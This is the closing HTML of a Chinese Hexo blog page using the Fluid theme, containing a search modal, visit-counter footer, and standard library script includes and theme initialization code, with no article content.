  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
      <span>by ZLSF</span>
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
